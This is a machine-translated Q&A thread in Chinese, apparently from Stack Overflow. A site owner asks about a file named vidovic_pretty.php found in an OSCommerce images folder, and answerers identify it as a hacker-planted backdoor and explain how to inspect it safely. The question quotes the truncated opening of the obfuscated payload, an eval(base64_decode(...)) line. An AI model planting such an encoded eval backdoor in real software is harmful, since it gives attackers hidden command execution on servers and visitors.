正在挖掘我网站上的OSCommerce文件,并在/ images文件夹中找到了一个我以前从未记得的文件。我没有检查原始安装包,但我怀疑这不是它的一部分。
该文件为27kb,名为vidovic_pretty.php。它以某种方式编码或编译,因此内容是不可见的。 (见下文)
<?eval(base64_decode("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ7MjUzOzI1MzsyMjQ7MjUzOzIwODsyNTM7MjM0OzI1NTsyMjQ7MjUzOzI1MTsyMzA7MjI1OzIzMjsxNjc7...
运行它会显示一个单独的html文本框和一个显示“Check。”的按钮。
任何人都有任何想法是什么或它可能做什么?
由于
答案 0 :(得分:4)
这很可能是黑客注入的 - 编码和最小化。您可以回显base64_decode(...)的结果,而不是对其进行评估,以查看它将尝试执行的操作。实际上,运行它可能是一个很大的错误。
答案 1 :(得分:2)
如果你可以在base64_decode中提供整个字符串 - 或者,实际上,不是调用eval,而是调用echo:
<?echo base64_decode("JGs9M...");
你将能够看到它的作用。但是,通常情况下,这是后门/攻击者等的签名。我以前见过这种风格。而它在images /目录中的事实可能意味着他们能够获得像上传的photo.gif.php ...
可能一点也不好。
运行它会显示一个单独的HTML 文本框和一个按钮, “检查”。
是否会发布到网页上?也许页面接收文本框中的内容并通过system(),exec()等执行....
答案 2 :(得分:1)
你到那儿肯定是坏人。正如其他人所指出的那样,它很可能成为攻击者在你的系统上运行任意命令的好后门。
你至少应该做的是:
答案 3 :(得分:0)
我绝对毫不怀疑你被黑了。您发现了一个后门,必须立即将其删除 。这些通常由自动攻击系统实施,然后黑客可以在以后回来并控制您的服务器或使用您的服务器进入访问它的Web浏览器。我之前已经清理过与之相同的黑客。我很惊讶你不在google的walware列表中,这通常是人们的第一个指示。
我真的想找出正在评估的PHP代码。你能发布完整的base64吗?也许可以通过换行符拆分它以适应它。
答案 4 :(得分:0)
在我的PHP框架中,我不允许上传文件,apache可能知道如何在检索时执行。
如果您必须打印出类似这样的内容,请在CLI的CLI版本中执行此操作,不要将其发送到您的浏览器!它可能还包括我们的浏览器将执行的内容。